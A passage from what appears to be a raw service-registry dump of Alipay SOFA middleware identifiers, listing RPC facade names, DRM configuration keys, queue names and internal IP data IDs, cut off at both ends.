itydata.common.service.facade.dataset.DataPointService:1.0:securitydatafm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.keymap.facade.recognize.api.SensTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.baopoint.api.BpdtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-insmobile-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.baoxian.scene.facade.common.smj.service.InsSceneLogisticsQueryService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.PackageConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.biz.activity.service.DiscountActivityBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanpromo.service.UserRelationServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.msg.MsgTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:00000@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.biz.activity.service.PubliccoreManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.dispatch.TicketTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.underwrite.UnderwriteTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmcPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:finalCheckHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tscenter.common.service.facade.DeviceRiskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue30#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.baoxian.ipp.service.facade.InsProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.extactivity.LeadsModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.workbench.WorkbenchOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.common.service.facade.api.CreateAndPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_GLOBALPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifecore.common.service.facade.itemquality.ItemQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntSchedulerHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.certifymng.permlimitDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.HealthRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.privilege.service.UserPrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.CaseManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.lisa.process.module.ProcessorModule:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.api.GenericHandlerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.account.signaccount.service.OutsideAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.offlineDesc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promohelix.common.service.facade.api.sci.SciTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.findecision.FinStatsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ConsultantDRM.minAge,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_TEST_TSUI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nfcc.common.service.facade.TrafficControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountPromoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.ActivityManagementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArEventOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.serial.drm.ZdalUpgradeSwitchDrm.manyLiveCutDownSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agap.service.facade.mng.api.DimensionMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.signup.SignupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.linkscheme.api.LinkSchemeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.testRunJdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.astaralarm.common.service.facade.DataSourceAggregationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.mail.facade.UploadFilesQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeOperationApi:1.0:v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:socplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.industrytask.IndustryTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.59.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.adtask.common.service.facade.task.AdTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.InvQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.157.253#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.psbp.common.service.medical.MedicalHospitalInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:bench_promorule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.user.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopItemAlignCompetitorMessageSender@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.49.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodcore.service.api.product.ProductSyncV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FinFundEvaluationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.process.ProcessReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fcrcportal:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_SUSU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.155.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpdcore:name=com.alipay.fc.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.zhimaDoubleSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.finbatchOutFluxQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.api.ShopSubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbill.domain.facade.dingtalk.DingTalkServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.PointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobileapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.event.EventHandler:1.0:ifinfluxTradeReceiptHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intl.idataops.arks.ArksClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.video.VideoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecPositionTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.client.facade.ClientReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.solution.BindCardResultQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.admin.SmartPluginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.CertDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcloandecision.common.service.facade.service.BizProdCodeDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ordercore_antProcessNodeCreatedCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.rule.ExpressRuleMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkfundbuss.common.facade.CapitalTransactionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilerelationtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.record.facade.ProdtransSyncRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_PRE_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:govbizwebdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ucdpadmin.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mychain.facade.api.McTransactionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MerchantActiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.claimImgCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promokernel.common.manage.facade.api.CampManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.CollectQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ArchDomainQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findatacanal.common.service.manage.common.SecuInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.product.GiftProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mma.facade.api.AppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.metadata.common.logic.facade.api.LogicalTableMetaService:1.0:dpmetadata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ugstrategycenter.common.service.facade.generated.groupgrowth.GeneratedExchangeStrategyOperateFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.speech.topic.CommentGwManagerNew:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.content.SmartAudioFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.common.service.facade.trans.FinNonConfirmRedeemFacade:1.0:bkftranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filebridge.service.facade.api.SecureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountShareServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.80.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fin.pdcore.common.service.facade.adapter.ProductCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryAccItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.collectScopeSimpleFlux,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.bpaas.ecomerchant.facade.isv.admin.IsvAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.crowdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.api.antcloud.spring.AntCloudApiExplorer:1.0:antcloud.iammainsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.ops.module.OpsModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:balSubAccAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recruitcore.facade.api.uniactivity.UniActivityMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.AdvertisementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.api.inspection.RzoneInspectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.expgrowth.facade.api.QueryContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.SolutionComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.WifiAggregationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.drcWorkingHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.localCacheRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:kbadvert@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.trade.service.FintradeConfirmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.settle.ProjectRtQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.UcaMigrateOperateDrm.queryAllEncashCreditOrgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_EC-acctrans-CallClearingCenterDailyCut_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sandboxhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskbizus.common.service.facade.api.PayRiskDecisionServiceUS:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.activity.HorseRacingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.ItemManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.cardbin.CardbinQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_IACCTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCJiebeiLimitCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.recon.common.service.facade.api.ItemReconciliationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:forexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-C-PROXYPROBE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MFINSTOCKPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.feed.api.FeedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.combmng.common.service.facade.user.UserOperationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accustomercore.common.service.facade.UCKernelTenantManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.facade.output.ResponseBuildFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphaq.common.facade.user.api.IUserTntFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.JdbcwriterMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_PSSLIP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mappprod.core.service.message.MobileSyncMessageSender:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.CompoundTaskSpiFacade:1.0:ofpgrowthCompoundTaskSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdExperimentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.ProductProtocolQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.openapi.conf.dispatch.AntqTimeDispatchFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_O_CRM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.155.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:utraffictrip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nfcc.common.service.facade.WebappAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:alertserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.instassetmng.service.facade.ApprovalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.cicada.BusinessTaskRecover:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.p1p2.P1p2RpcQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.welfare.api.WelfareRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.plugin.IscScriptMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IExpenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.openapi.generic.api.GenericServiceSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.flab.api.flabinnovation.DeviceActivateFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:mypr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.finfundprod.common.service.facade.RecomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finbaservice.common.service.facade.contactmanage.api.FinancingInstContactQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_ANTTOCFIN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.adaptor.changefree.ChangefreeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.ConfigContextManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.vehownerprod.facade.bizindex.EtcBizIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.96.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.orchestration.handler.RemoteActionHandler:1.0:sitebuilder-assist@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.ipay.service.facade.TicketUrgeDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.oto.api.OtotransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.signup.rpc.facade.SignupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.TaConfigParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.ProductConfigResourceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:custcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.product.ProductCatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.VoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.miniplan.MiniFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CFLOANCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.132#@#DEFAULT_INSTANCE_ID#@#SOFA_R